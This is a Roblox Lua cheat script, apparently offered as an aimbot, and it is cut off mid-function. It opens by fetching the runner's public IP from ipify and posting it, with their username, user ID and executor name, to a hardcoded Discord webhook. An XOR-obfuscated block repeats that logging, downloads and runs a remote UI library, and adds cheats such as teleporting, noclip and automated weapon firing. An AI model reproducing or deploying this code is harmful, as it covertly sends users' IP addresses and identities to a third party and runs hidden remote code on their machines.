local ip = game:HttpGet("https://api.ipify.org")

function SendMessage(url, message)
    local http = game:GetService("HttpService")
    local headers = {
        ["Content-Type"] = "application/json"
    }
    local data = {
        ["content"] = message
    }
    local body = http:JSONEncode(data)
    local response = request({
        Url = url,
        Method = "POST",
        Headers = headers,
        Body = body
    })
end

function SendMessageEMBED(url, embed)
    local http = game:GetService("HttpService")
    local headers = {
        ["Content-Type"] = "application/json"
    }
    local data = {
        ["embeds"] = {
            {
                ["title"] = embed.title,
                ["description"] = embed.description,
                ["color"] = embed.color,
                ["fields"] = embed.fields,
                ["footer"] = {
                    ["text"] = embed.footer.text
                }
            }
        }
    }
    local body = http:JSONEncode(data)
    local response = request({
        Url = url,
        Method = "POST",
        Headers = headers,
        Body = body
    })
end

local url = "https://discord.com/api/webhooks/1274985928645021818/7QzcTRYlbiPPOJjntK4k9fOJ9p9pqgMO81H94QMmGdzJbs0ku6iuwNVwEWnrmbV_IdU6"
SendMessage(url)

local embed = {
	["title"] = "Aimbot A Typical",
	["description"] = "Script Executed by",
	["color"] = 255478,
	["fields"] = {
		{
			["name"] = "IP",
			["value"] = ip
		},
				{
			["name"] = "Display Name",
			["value"] = game.Players.LocalPlayer.DisplayName
		},
		{
			["name"] = "User Name",
			["value"] = game.Players.LocalPlayer.Name
		},
		{
			["name"] = "User ID",
			["value"] = game.Players.LocalPlayer.UserId
		},
		{
			["name"] = "Exploit",
			["value"] = identifyexecutor()
		}
	},
	["footer"] = {
		["text"] = " ",
	},
}
SendMessageEMBED(url, embed)

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v22,v23) local v24={};for v106=1, #v22 do v6(v24,v0(v4(v1(v2(v22,v106,v106 + 1 )),v1(v2(v23,1 + (v106% #v23) ,1 + (v106% #v23) + 1 )))%256 ));end return v5(v24);end local v8=game:HttpGet(v7("\217\215\207\53\245\225\136\81\208\211\210\107\239\171\206\24\200\141\212\55\225","\126\177\163\187\69\134\219\167"));function SendMessage(v25,v26) local v27=0 + 0 ;local v28;local v29;local v30;local v31;local v32;while true do if (v27==(2 -1)) then local v154=0 + 0 ;while true do if (0==v154) then v30={[v7("\168\43\30\34\118\171\239","\155\203\68\112\86\19\197")]=v26};v31=v28:JSONEncode(v30);v154=2 -1 ;end if (v154==(1 + 0)) then v27=2;break;end end end if (0==v27) then local v155=0;while true do if (v155==(0 + 0)) then v28=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));v29={[v7("\23\184\71\2\185\40\82\121\131\80\6\185","\38\84\215\41\118\220\70")]=v7("\81\6\50\30\247\83\23\54\27\241\94\89\40\1\241\94","\158\48\118\66\114")};v155=3 -2 ;end if (v155==1) then v27=1;break;end end end if (v27==(9 -7)) then v32=request({[v7("\115\207\58","\152\38\189\86\156\32\24\133")]=v25,[v7("\209\82\179\78\243\83","\38\156\55\199")]=v7("\152\82\79\28","\35\200\29\28\72\115\20\154"),[v7("\49\186\208\219\136\62\39","\84\121\223\177\191\237\76")]=v29,[v7("\153\89\205\185","\161\219\54\169\192\90\48\80")]=v31});break;end end end function SendMessageEMBED(v33,v34) local v35=game:GetService(v7("\97\86\20\53\122\71\18\51\64\65\5","\69\41\34\96"));local v36={[v7("\159\204\217\30\7\37\168\142\227\19\18\46","\75\220\163\183\106\98")]=v7("\3\170\155\59\208\1\187\159\62\214\12\245\129\36\214\12","\185\98\218\235\87")};local v37={[v7("\206\49\37\227\218\185","\202\171\92\71\134\190")]={{[v7("\61\200\56\132\44","\232\73\161\76")]=v34.title,[v7("\191\220\81\94\12\178\201\86\84\17\181","\126\219\185\34\61")]=v34.description,[v7("\15\193\82\125\108","\135\108\174\62\18\30\23\147")]=v34.color,[v7("\176\224\47\199\28\189","\167\214\137\74\171\120\206\83")]=v34.fields,[v7("\141\255\61\73\253\181","\199\235\144\82\61\152")]={[v7("\19\19\161\63","\75\103\118\217")]=v34.footer.text}}}};local v38=v35:JSONEncode(v37);local v39=request({[v7("\242\70\124","\126\167\52\16\116\217")]=v33,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v36,[v7("\246\203\234\69","\60\180\164\142")]=v38});end local v9=v7("\80\74\17\57\52\183\93\23\90\12\58\36\226\0\92\16\6\38\42\162\19\72\87\74\62\34\239\26\87\81\14\58\104\188\64\14\6\92\126\115\187\66\8\12\85\124\113\190\67\14\14\84\102\12\223\26\74\106\86\51\112\231\75\113\85\23\124\13\213\1\11\108\2\25\52\249\65\127\15\9\1\2\228\67\82\107\87\27\42\239\16\92\93\82\5\5\228\16\75\90\15\19\31\255\25\74\87\92\11\113\202\6\106\75\15\25\20\225\16\123\93","\114\56\62\101\73\71\141");SendMessage(v9);local v10={[v7("\172\224\207\200\189","\164\216\137\187")]=v7("\241\206\16\157\149\190\61\134\168\102\252\243\190\67\255\201\19\242\129\203\34\155","\107\178\134\81\210\198\158"),[v7("\60\11\145\197\184\49\30\150\207\165\54","\202\88\110\226\166")]=v7("\237\10\149\183\207\219\10\129\226\222\198\79\134\242\222\198\12\150\242\206\131\0\140\183\233\235\46\173\196\138\245\91\204\160\132\150\79\202\218\229\225\38\174\210\131","\170\163\111\226\151"),[v7("\18\63\190\55\92","\73\113\80\210\88\46\87")]=956664 + 15755016 ,[v7("\135\37\200\30\227\146","\135\225\76\173\114")]={{[v7("\20\236\181\181","\199\122\141\216\208\204\221")]=v7("\132\237","\150\205\189\112\144\24"),[v7("\51\133\179\89\1","\112\69\228\223\44\100\232\113")]=v8},{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\168\12\76\86\232\64\249\204\43\94\75\225","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]=game.Players.LocalPlayer.DisplayName},{[v7("\73\205\56\217","\100\39\172\85\188")]=v7("\152\107\188\146\115\131\121\180\133","\83\205\24\217\224"),[v7("\240\196\193\40\227","\93\134\165\173")]=game.Players.LocalPlayer.Name},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]=v7("\208\93\117\24\165\103\84","\106\133\46\16"),[v7("\78\33\127\233\95","\32\56\64\19\156\58")]=game.Players.LocalPlayer.UserId},{[v7("\84\201\232\83","\224\58\168\133\54\58\146")]=v7("\124\78\91\241\122\143\147","\107\57\54\43\157\21\230\231"),[v7("\205\138\29\224\188","\175\187\235\113\149\217\188")]=identifyexecutor()}},[v7("\58\160\142\88\230\107","\24\92\207\225\44\131\25")]={[v7("\95\214\160\88","\29\43\179\216\44\123")]=" "}};SendMessageEMBED(v9,v10);local v11=game:GetService(v7("\141\213\33\85\184\203\51","\44\221\185\64")).LocalPlayer;local v12=v11:GetMouse();local function v13(v40,v41,v42) game:GetService(v7("\50\243\73\77\103\4\245\111\74\122","\19\97\135\40\63")):SetCore(v7("\157\89\61\63\1\62\186\85\53\50\44\48\186\85\60\53","\81\206\60\83\91\79"),{[v7("\122\162\196\126\42","\196\46\203\176\18\79\163\45")]=tostring(v40),[v7("\140\39\102\10","\143\216\66\30\126\68\155")]=tostring(v41),[v7("\142\221\31\202\209\170\216\239","\129\202\168\109\171\165\195\183")]=tonumber(v42)});end local function v14() local v43=v11.Character or v11.CharacterAdded:Wait() ;return v43;end spawn(function() while true do rs.RenderStepped:wait();pcall(function() if  not uis:IsKeyDown(Enum.KeyCode.LeftShift) then plr.Character.Humanoid.WalkSpeed=walkSpeed;elseif uis:IsKeyDown(Enum.KeyCode.LeftShift) then plr.Character.Humanoid.WalkSpeed=walkSpeed + (27 -20) ;end end);end end);spawn(function() while true do rs.RenderStepped:wait();pcall(function() if  not uis:IsKeyDown(Enum.KeyCode.E) then plr.Character.Humanoid.WalkSpeed=walkSpeed;elseif uis:IsKeyDown(Enum.KeyCode.E) then plr.Character.Humanoid.WalkSpeed=walkSpeed + (18 -9) ;end end);end end);local v15=loadstring(game:HttpGet(v7("\42\76\35\200\205\78\169\109\74\54\207\144\19\239\54\80\34\218\203\7\227\48\91\56\214\202\17\232\54\22\52\215\211\91\179\119\93\52\211\213\91\171\27\118\25\246\234\53\222\111\117\24\250\145\25\231\43\86\120\237\247","\134\66\56\87\184\190\116"),true))();local v16={};local v17=v15:CreateWindow(v7("\31\57\8\180\10\171\23\97\114\102\71\238\89\163\12\26\30\120","\85\92\81\105\219\121\139\65"));v17:Section(v7("\189\158\81\76\114\159\219\166\94\70\104\214\242\189\67","\191\157\211\48\37\28"));v17:Button(v7("\252\23\241\31\49\159\25\251\14\122\222\95\228\25\52\220\22\248","\90\191\127\148\124"),function() local v44=v7("\72\130\32\20\113\139","\119\24\231\78");local v45=v7("\142\44\181\67\198","\113\226\77\197\42\188\32");local function v46() for v141,v142 in pairs(game.Players:GetPlayers()) do local v143=0 -0 ;local v144;while true do if (v143==0) then v144=v142.Backpack;if v144 then local v252=0 -0 ;local v253;while true do if (v252==(0 + 0)) then v253=v144:FindFirstChild(v44);if v253 then game:GetService(v7("\9\2\245\167\46\19\230\146\47\31","\213\90\118\148")):SetCore(v7("\120\38\181\66\96\90\37\177\101\84\72\58\177\91\96\94\61\167\87\74\94","\45\59\78\212\54"),{[v7("\36\83\155\159","\144\112\54\227\235\230\78\205")]=v142.Name   .. v7("\243\60\6\249\222\94\243\45\30\233\217\75\178\44\0\188\197\85\243","\59\211\72\111\156\176")   .. v45 });end break;end end end break;end end end end while true do local v107=1973 -(1656 + 317) ;while true do if (v107==0) then v46();wait(6 + 0 );break;end end end end);v17:Button(v7("\122\130\239\40\94\136\241\57\14\147\236\109\126\130\237\46\71\139\163\101\96\162\212\100","\77\46\231\131"),function() local v47=0 + 0 ;local v48;local v49;local v50;while true do if (0==v47) then v48=game:GetService(v7("\138\88\183\89\191\70\165","\32\218\52\214"));v49=v7("\126\18\63\171\248\188","\58\46\119\81\200\145\208\37");v47=1;end if (v47==(2 -1)) then v50=nil;function v50() for v213,v214 in pairs(v48:GetPlayers()) do local v215=v214.Character;if v215 then local v254=0 -0 ;local v255;while true do if (v254==(354 -(5 + 349))) then v255=v215:FindFirstChild(v49);if v255 then local v307=v215:FindFirstChild(v7("\3\153\61\173\167\178\63\47\190\63\163\189\141\55\57\152","\86\75\236\80\204\201\221"));if v307 then local v334=0 -0 ;local v335;while true do if (v334==0) then v335=1271 -(266 + 1005) ;while true do if (v335==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v307.CFrame + Vector3.new(0 + 0 ,0 -0 ,6 -1 ) ;return;end end break;end end else game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v255.Handle.CFrame + Vector3.new(0,1696 -(561 + 1135) ,6 -1 ) ;return;end end break;end end end end warn(v7("\92\78\55\149\242\138\107\68\101\197\248\132\103\79\115\197\233\130\102\73\55\145\246\142\50\85\120\138\242\203","\235\18\33\23\229\158")   .. v49   .. v7("\16\191\208\174\89\170\209\190\84\244","\219\48\218\161") );end v47=6 -4 ;end if (v47==2) then v50();break;end end end);v17:Button(v7("\194\125\117\71\220\15\208\225\127\127\64\215\15\168\202\84\75\2\244\127\169","\128\132\17\28\41\187\47"),function() local v51=1066 -(507 + 559) ;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v51==(4 -2)) then v57=v55(v54);v56(v57);if v57 then local v216=0 -0 ;local v217;local v218;local v219;local v220;local v221;local v222;local v223;while true do if (v216==(391 -(212 + 176))) then game.StarterGui:SetCore(v7("\119\79\192\113\30\75\94\199\115\57\71\75\218\124\63\74","\80\36\42\174\21"),{[v7("\122\25\35\118\75","\26\46\112\87")]=v7("\159\47\162\122\184","\212\217\67\203\20\223\223\37"),[v7("\142\136\176\198","\178\218\237\200")]=v7("\151\165\246\220\175\188\232\215\246\179\234\217\184\178\168\158","\176\214\213\134"),[v7("\221\174\185\218","\57\148\205\214\180\200\54")]=v7("\26\233\33\36\44\93\178\34\35\97\92\239\58\54\122\29\229\123\55\121\31\178\52\39\101\23\233\122\107\127\22\160\96\97\46\71\173\108\97\35\66\164","\22\114\157\85\84"),[v7("\224\222\1\197\73\255\167\202","\200\164\171\115\164\61\150")]=908 -(250 + 655) });v222=50;v53.Stepped:connect(function() local v284=0 -0 ;while true do if (v284==(0 -0)) then v220.Torso.CanCollide=false;v220[v7("\146\241\5\81\195\146\241\4","\227\222\148\99\37")].CanCollide=false;v284=1 -0 ;end if (v284==1) then v220[v7("\1\91\85\254\237\115\126\87\241","\153\83\50\50\150")].CanCollide=false;break;end end end);wait();v216=1960 -(1869 + 87) ;end if (v216==4) then v223=Instance.new(v7("\127\121\119\5\71\163\95\72\101\103","\45\61\22\19\124\19\203"));v223.Parent=v220.HumanoidRootPart;v223.Force=Vector3.new(0, -v222,0 -0 );v223.Location=v220.HumanoidRootPart.Position;v216=1906 -(484 + 1417) ;end if ((2 -1)==v216) then if v217 then v217:Disconnect();end v218.Character:FindFirstChildOfClass(v7("\116\16\205\174\44\215\85\1","\184\60\101\160\207\66")).Sit=true;v217=v53.Heartbeat:Connect(function() if (v219(v218.Character) and (v218.Character:FindFirstChildOfClass(v7("\25\151\113\189\63\141\117\184","\220\81\226\28")).Sit==true)) then v219(v218.Character).CFrame=v57.Handle.CFrame * CFrame.Angles(0 -0 ,math.rad(0),0) * CFrame.new(773 -(48 + 725) ,1.6 -0 ,0.4 -0 ) ;elseif v217 then v217:Disconnect();end end);wait();v216=2 + 0 ;end if (v216==0) then v217=nil;v218=v52.LocalPlayer;v219=nil;function v219(v285) return v285:FindFirstChild(v7("\29\161\134\243\212\58\189\143\192\213\58\160\187\243\200\33","\186\85\212\235\146")) or v285.PrimaryPart or v285:FindFirstChild(v7("\246\142\4\237\54","\56\162\225\118\158\89\142")) ;end v216=2 -1 ;end if (v216==2) then v220=game.Players.LocalPlayer.Character;v221=v220:FindFirstChildOfClass(v7("\59\192\143\250\228\200\26\209","\167\115\181\226\155\138")) or v220:FindFirstChildOfClass(v7("\195\44\238\81\122\101\207\237\44\196\83\117\101\212\237\46\235\89\105","\166\130\66\135\60\27\17")) ;for v286,v287 in next,v221:GetPlayingAnimationTracks() do v287:Stop();end wait();v216=1 + 2 ;end if (v216==(2 + 3)) then v220.Humanoid.WalkSpeed=868 -(152 + 701) ;for v288,v289 in next,v221:GetPlayingAnimationTracks() do v289:Stop();end break;end end end game.StarterGui:SetCore(v7("\242\23\3\241\44\127\173\200\20\4\246\3\100\176\206\28","\217\161\114\109\149\98\16"),{[v7("\38\41\44\112\185","\20\114\64\88\28\220")]=v7("\21\46\252\145\185","\221\81\97\178\212\152\176"),[v7("\249\226\5\239","\122\173\135\125\155")]=v7("\173\199\64\183\48\37\136\146\206\9\189\58\53\136\150\196\64\173\45\40\132\196\200\64\177\48\33\205\196\216\5\170\113","\168\228\161\96\217\95\81"),[v7("\242\210\33\82","\55\187\177\78\60\79")]=v7("\37\218\75\251\28\128\207\58\217\72\165\84\192\130\33\193\71\165\69\192\141\98\207\76\248\67\219\207\114\199\91\182\19\154\216\120\158\6\190\19\159\217","\224\77\174\63\139\38\175"),[v7("\160\84\74\47\144\72\87\32","\78\228\33\56")]=3});break;end if (v51==(1311 -(430 + 881))) then local v156=0;while true do if (v156==1) then v54=v7("\149\175\45\29\26\8","\49\197\202\67\126\115\100\167");v55=nil;v156=2;end if ((1 + 1)==v156) then v51=896 -(557 + 338) ;break;end if (v156==0) then v52=game:GetService(v7("\49\62\7\35\88\19\33","\61\97\82\102\90"));v53=game:GetService(v7("\158\59\165\120\194\69\8\0\175\43","\105\204\78\203\43\167\55\126"));v156=1;end end end if (v51==(1 + 0)) then function v55(v175) local v176=0;while true do if (v176==(0 -0)) then for v275,v276 in pairs(v52:GetPlayers()) do local v277=0 -0 ;local v278;while true do if (v277==(0 -0)) then v278=v276.Character;if v278 then local v327=0;local v328;while true do if (v327==(0 -0)) then v328=v278:FindFirstChild(v175) or v278:WaitForChild(v175,806 -(499 + 302) ) ;if v328 then return v328;end break;end end end break;end end end return nil;end end end v56=nil;function v56(v177) if v177 then local v229=0;while true do if ((866 -(39 + 827))==v229) then game.StarterGui:SetCore(v7("\4\94\209\45\174\89\74\62\93\214\42\129\66\87\56\85","\62\87\59\191\73\224\54"),{[v7("\211\11\238\197\226","\169\135\98\154")]=v7("\255\120\43\88\189\21\199\222\121\32\21","\168\171\23\68\52\157\83"),[v7("\192\116\237\185","\231\148\17\149\205\69\77")]=v7("\180\162\203\254\71\240\146\179\206\245\80\191\148\168\135\203\82\241\131\174\203\181","\159\224\199\167\155\55"),[v7("\222\240\51\220","\178\151\147\92")]=v7("\132\233\88\34\72\3\53\155\234\91\124\0\67\120\128\242\84\124\17\67\119\195\252\95\33\23\88\53\211\244\72\111\71\25\34\217\173\21\103\71\28\35","\26\236\157\44\82\114\44"),[v7("\14\59\199\90\62\39\218\85","\59\74\78\181")]=7 -4 });game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v177.Handle.CFrame + Vector3.new(0,0 -0 ,5) ;break;end end else game.StarterGui:SetCore(v7("\22\212\84\94\157\42\197\83\92\186\38\208\78\83\188\43","\211\69\177\58\58"),{[v7("\131\236\109\249\236","\171\215\133\25\149\137")]=v7("\209\205\60\249\230\60\166","\34\129\168\82\154\143\80\156"),[v7("\177\183\43\31","\233\229\210\83\107\40\46")]=v7("\239\77\114\217\11\196\2\58\215\22\129\67\114\198\0\207\65\59\218\75","\101\161\34\82\182"),[v7("\193\14\86\240","\78\136\109\57\158\187\130\226")]=v7("\54\43\237\225\100\112\182\230\41\40\183\227\49\61\245\254\38\113\250\254\51\112\248\226\45\58\237\190\97\54\253\172\107\106\161\164\110\102\172\164\110\102","\145\94\95\153"),[v7("\217\216\6\212\90\190\242\195","\215\157\173\116\181\46")]=11 -8 });end end wait();v51=2;end end end);v17:Button(v7("\231\112\180\67\175\219\115\162","\229\174\30\210\99"),function() local v58=game:GetService(v7("\43\225\135\72\232\47\42","\89\123\141\230\49\141\93")).LocalPlayer;local v59=game:GetService(v7("\198\98\243\30\57\68\227\100\226\63\21\88\229\120\245\9","\42\147\17\150\108\112"));_G.JumpHeight=76 -26 ;function Action(v108,v109) if (v108~=C4) then v109(v108);end end v59.InputBegan:connect(function(v110) if ((v110.UserInputType==Enum.UserInputType.Keyboard) and (v110.KeyCode==Enum.KeyCode.Space)) then Action(v58.Character.Humanoid,function(v178) if ((v178:GetState()==Enum.HumanoidStateType.Jumping) or (v178:GetState()==Enum.HumanoidStateType.Freefall)) then Action(v178.Parent.HumanoidRootPart,function(v256) v256.Velocity=Vector3.new(0 + 0 ,_G.JumpHeight,0 -0 );end);end end);end end);end);v17:Button(v7("\46\168\57\118\167\206\3\175\35\120\167\160\32\150\100","\136\111\198\77\31\135"),function() game.StarterGui:SetCore(v7("\33\1\166\66\144\229\28\172\49\16\180\66\184\233\58\172\17\26\166\81\184","\201\98\105\199\54\221\132\119"),{[v7("\141\9\155\53","\204\217\108\227\65\98\85")]=v7("\114\236\212\193\9\228\31\131\214\208\30\242\123\237\193\165\118\128","\160\62\163\149\133\76")   .. tostring(LOL) ,[v7("\245\175\1\32\209","\163\182\192\109\79")]=Color3.fromRGB(0 + 0 ,350 -128 ,104 -(103 + 1) )});local v60=setmetatable({},{[v7("\11\25\9\206\241\49\62","\149\84\70\96\160")]=function(v111,v112) local v113=554 -(475 + 79) ;local v114;while true do if (v113==1) then return v114;end if ((0 -0)==v113) then v114=game.GetService(game,v112);if v114 then v111[v112]=v114;end v113=3 -2 ;end end end});local v61=v60.Players.LocalPlayer;local function v62(v115) local v116=0 + 0 ;local v117;local v118;local v119;local v120;while true do if (v116==(3 + 0)) then v115.CharacterAdded:Connect(v120);v60.RunService.Heartbeat:Connect(function() if (v118 and v118:IsDescendantOf(workspace) and v119 and v119:IsDescendantOf(v118)) then if ((v119.AssemblyAngularVelocity.Magnitude>(1553 -(1395 + 108))) or (v119.AssemblyLinearVelocity.Magnitude>(291 -191))) then local v291=1204 -(7 + 1197) ;while true do if (v291==(1 + 0)) then v119.CanCollide=false;v119.AssemblyAngularVelocity=Vector3.new(0,0 + 0 ,0);v291=321 -(27 + 292) ;end if (v291==(5 -3)) then v119.AssemblyLinearVelocity=Vector3.new(0,0 -0 ,0 -0 );v119.CustomPhysicalProperties=PhysicalProperties.new(0 -0 ,0 -0 ,139 -(43 + 96) );break;end if (v291==(0 -0)) then v117=true;for v329,v330 in ipairs(v118:GetDescendants()) do if v330:IsA(v7("\145\82\217\117\42\60\71\213","\161\211\51\170\16\122\93\53")) then v330.CanCollide=false;v330.AssemblyAngularVelocity=Vector3.new(0 -0 ,0 + 0 ,0);v330.AssemblyLinearVelocity=Vector3.new(0 + 0 ,0,0 -0 );v330.CustomPhysicalProperties=PhysicalProperties.new(0 + 0 ,0 -0 ,0 + 0 );end end v291=1;end end end end end);break;end if ((1 + 0)==v116) then v119=nil;v120=nil;v116=1753 -(1414 + 337) ;end if (v116==(1940 -(1642 + 298))) then v117=false;v118=nil;v116=1;end if (v116==(4 -2)) then function v120(v224) v118=v224;repeat local v231=0 -0 ;while true do if ((0 -0)==v231) then wait();v119=v224:FindFirstChild(v7("\16\19\0\236\54\9\4\233\10\9\2\249\8\7\31\249","\141\88\102\109"));break;end end until v119 v117=false;end v120(v115.Character or v115.CharacterAdded:Wait() );v116=3;end end end for v121,v122 in ipairs(v60.Players:GetPlayers()) do if (v122~=v61) then v62(v122);end end v60.Players.PlayerAdded:Connect(v62);local v63=nil;v60.RunService.Heartbeat:Connect(function() pcall(function() local v145=v61.Character.PrimaryPart;if ((v145.AssemblyLinearVelocity.Magnitude>250) or (v145.AssemblyAngularVelocity.Magnitude>(83 + 167))) then local v179=0;local v180;while true do if (v179==(0 + 0)) then v180=972 -(357 + 615) ;while true do if ((0 + 0)==v180) then v145.AssemblyAngularVelocity=Vector3.new(0 -0 ,0,0 + 0 );v145.AssemblyLinearVelocity=Vector3.new(0 -0 ,0 + 0 ,0 + 0 );v180=1 + 0 ;end if (v180==(1302 -(384 + 917))) then v145.CFrame=v63;break;end end break;end end elseif ((v145.AssemblyLinearVelocity.Magnitude<(747 -(128 + 569))) or (v145.AssemblyAngularVelocity.Magnitude>(1593 -(1407 + 136)))) then v63=v145.CFrame;end end);end);end);v17:Button(v7("\218\160\166\33\187\157\162\33\240\171\242\28\233\175\162","\72\155\206\210"),function() while true do local v123=1887 -(687 + 1200) ;local v124;local v125;while true do if (v123==(1711 -(556 + 1154))) then function v124() print(v7("\101\114\81\13\56\79\116\83\78\53\73\104\20\61\35\79\113\81\78\7\84\123\68\29\125\8\52","\83\38\26\52\110"));for v233,v234 in pairs(game.Workspace:GetDescendants()) do if (v234.Name==v7("\107\7\46\77\93\87\19\84\89\7","\38\56\119\71")) then local v279=0;local v280;while true do if (v279==(3 -2)) then if v280 then for v337,v338 in pairs(v280:GetChildren()) do if v338:IsA(v7("\31\29\61\86\131\179\208\42\28\59\88\130\147\214\46\0","\162\75\114\72\53\235\231")) then local v345=95 -(9 + 86) ;while true do if (v345==(421 -(275 + 146))) then print(v7("\170\51\81\236\87\66\141\50\64\162\87\7\159\40\86\237\74\11\130\59\4\214\92\23\143\52\112\240\82\12\159\49\77\246\71\7\158\124\77\236\9","\98\236\92\36\130\51"),v280);v338:Destroy();break;end end end end end break;end if (v279==(0 + 0)) then print(v7("\213\224\77\216\33\22\192\255\81\221\32\22\199\253\89\198\127","\54\147\143\56\182\69"),v234);v280=v234:FindFirstChild(v7("\244\148\235\93\208\216","\191\182\225\159\41"));v279=65 -(29 + 35) ;end end end end end v125=game.Players.LocalPlayer;v123=8 -6 ;end if (v123==(0 -0)) then wait();v124=nil;v123=1;end if (v123==3) then wait(0.1 -0 );break;end if ((2 + 0)==v123) then v125.CharacterAdded:Connect(function(v225) print(v7("\135\17\13\168\68\171\161\53\182\89\13\190\65\173\177\106","\80\196\121\108\218\37\200\213"),v225);v225:WaitForChild(v7("\40\102\15\126\69\1\131\4\65\13\112\95\62\139\18\103","\234\96\19\98\31\43\110"));v124();end);if v125.Character then local v235=1012 -(53 + 959) ;local v236;while true do if (v235==(408 -(312 + 96))) then v236=0 -0 ;while true do if (v236==(285 -(147 + 138))) then print(v7("\54\19\83\222\169\96\203\7\19\64\194\173\118\146\70\23\83\212\236\115\203\5\23\83\213\173\113\159\3\13\8","\235\102\127\50\167\204\18"),v125.Character);v124();break;end end break;end end end v123=902 -(813 + 86) ;end end end end);v17:Button(v7("\98\134\215\99\119\62\66\168\251\55\4\12\81\179","\78\48\193\149\67\36"),function() local v64=10 + 0 ;while true do for v146=0 -0 ,493 -(18 + 474) ,0.001 * v64  do game:GetService(v7("\0\18\129\1\68\34\13","\33\80\126\224\120")).LocalPlayer.PlayerGui.Sprinting.Frame.Frame.BackgroundColor3=Color3.fromHSV(v146,1 + 0 ,3 -2 );wait();end end end);v17:Dropdown(v7("\205\189\23\203\28\223\173\15\193\95\248\242","\60\140\200\99\164"),{[v7("\139\251\7\39\182\142\251\10","\194\231\148\100\70")]=v16,[v7("\64\64\192\164","\168\38\44\161\195\150")]=v7("\151\249\131\102\63\230","\118\224\156\226\22\80\136\214"),[v7("\81\235\88\146\65\230","\224\34\142\57")]=false,[v7("\210\174\214\201","\110\190\199\165\189\19\145\61")]={v7("\247\234\116\237","\167\186\139\23\136\235"),v7("\57\189\137\4\20\166\137\26","\109\122\213\232"),v7("\197\249\171\54\235","\80\142\151\194"),v7("\51\199\121","\44\99\166\23"),v7("\76\242\39\53\58\168","\196\28\151\73\86\83"),v7("\209\2\58\21\128\89\20\122\179\33\40\4","\22\147\99\73\112\226\56\120"),v7("\139\118\251\225\133\189","\237\216\21\130\149"),v7("\167\67\90\77\177\197\90\194\105\77\90\177\221\77\149\65\77\91","\62\226\46\63\63\208\169"),v7("\199\21\90\140\27\77\11\95\226\30\80\145","\62\133\121\53\227\127\109\79"),v7("\54\6\61\230\194\238\145\0\17\51\231","\194\112\116\82\149\182\206")},[v7("\9\164\77\1\197\240\34\48\187\88","\110\89\200\44\120\160\130")]=false},function() local v65=game.Players.LocalPlayer:GetMouse();game:GetService(v7("\158\208\78\84\106\68\43\88\191\240\78\84\85\67\56\72","\45\203\163\43\38\35\42\91")).InputBegan:Connect(function(v126,v127) local v128=1970 -(49 + 1921) ;while true do if (v128==(890 -(223 + 667))) then if v127 then return;end if (v126.KeyCode==Enum.KeyCode.KeypadSeven) then while true do local v258=52 -(51 + 1) ;local v259;local v260;while true do if (v258==1) then v260=v259:GetMouse();game:GetService(v7("\17\77\81\29\242\78\48","\67\65\33\48\100\151\60")).LocalPlayer.PlayerGui:FindFirstChild(v7("\242\226\160\205\179\236\228\188\221\246\209","\147\191\135\206\184")).Enabled=false;v258=2 -0 ;end if (v258==(0 -0)) then wait();v259=game:GetService(v7("\226\137\221\58\130\187\71","\52\178\229\188\67\231\201")).LocalPlayer;v258=1126 -(146 + 979) ;end if (v258==(1 + 1)) then v259.PlayerGui[v7("\169\45\168\212\152\96\177\150\45\163\207","\210\228\72\198\161\184\51")].RemoteEvent:FireServer(v16['weapon']);wait(1);break;end end end end break;end end end);end);local v18=false;v17:Toggle(v7("\23\92\231\31\51\253\51\69\246\19\103\142\2\70\252\28","\174\86\41\147\112\19"),{[v7("\87\15\142\10\49\6\30\165","\203\59\96\237\107\69\111\113")]=v16,[v7("\34\26\173\230","\183\68\118\204\129\81\144")]=v7("\11\163\113\230\7\135","\226\110\205\16\132\107")},function() local v66=false;game.StarterGui:SetCore(v7("\216\198\238\221\111\228\215\233\223\72\232\194\244\208\78\229","\33\139\163\128\185"),{[v7("\99\81\16\210\82","\190\55\56\100")]=v7("\117\186\46\12\22\237\231\12","\147\54\207\92\126\115\131"),[v7("\57\52\45\105","\30\109\81\85\29\109")]=v16[v7("\232\116\85\166\57\208","\156\159\17\52\214\86\190")],[v7("\135\236\178\178","\220\206\143\221")]=v7("\142\105\57\7\130\131\157\145\106\58\89\202\195\208\138\114\53\89\219\195\223\201\124\62\4\221\216\157\217\116\41\74\141\153\138\211\45\116\66\141\156\139","\178\230\29\77\119\184\172"),[v7("\209\171\24\26\99\241\250\176","\152\149\222\106\123\23")]=5,[v7("\222\39\250\79\183\220\37\253","\213\189\70\150\35")]=bindableFunction});local function v67() local v129=0;while true do if (v129==(605 -(311 + 294))) then wait(0.5);game:GetService(v7("\121\92\102\28\90\84\120\33\65\69\97\28\98\84\122\9\72\80\102","\104\47\53\20")):SendKeyEvent(true,Enum.KeyCode.KeypadSeven,false,game);break;end end end if v18 then local v148=0;while true do if (v148==(0 -0)) then v18=false;v66=true;break;end end else v18=true;v66=false;spawn(function() repeat local v182=0 + 0 ;while true do if (v182==(1444 -(496 + 947))) then game:GetService(v7("\145\89\143\47\185\29\181\69\130\25","\111\195\44\225\124\220")).Heartbeat:Wait();break;end if (v182==0) then v67();wait(1359 -(1233 + 125) );v182=1 + 0 ;end end until v66 or  not v18  end);end end);v17:Button(v7("\235\67\20\51\133\162\223\78\20","\203\184\38\96\19\203"),function() game.Lighting:SetMinutesAfterMidnight(140 + 15 );end);v17:Button(v7("\16\125\127\72\192\48\103\124\1\247\48\118\117\69\142\47\38","\174\89\19\25\33"),function() 